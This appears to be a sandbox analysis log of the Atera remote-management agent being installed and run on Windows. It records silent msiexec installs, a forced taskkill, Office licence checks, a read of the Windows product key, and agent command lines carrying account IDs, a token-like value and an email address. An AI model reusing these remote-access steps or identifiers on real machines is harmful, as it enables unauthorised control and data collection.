                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="barrostransportes2018@gmail.com" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000mhga9iap" /agentid="3757c761-9e50-4f15-8086-0e584dceea48"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kin0=" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/production 443 or8ixli90mf "syncprofile" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/production 443 or8ixli90mf "generalinfo" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemarketplace\agentpackagemarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/production 443 or8ixli90mf "agentprovision" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/production 443 or8ixli90mf "monitor" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemarketplace\agentpackagemarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/production 443 or8ixli90mf "agentprovision" 001q300000mhga9iap
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB739C cpuid 37_2_00007FFB02EB739C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
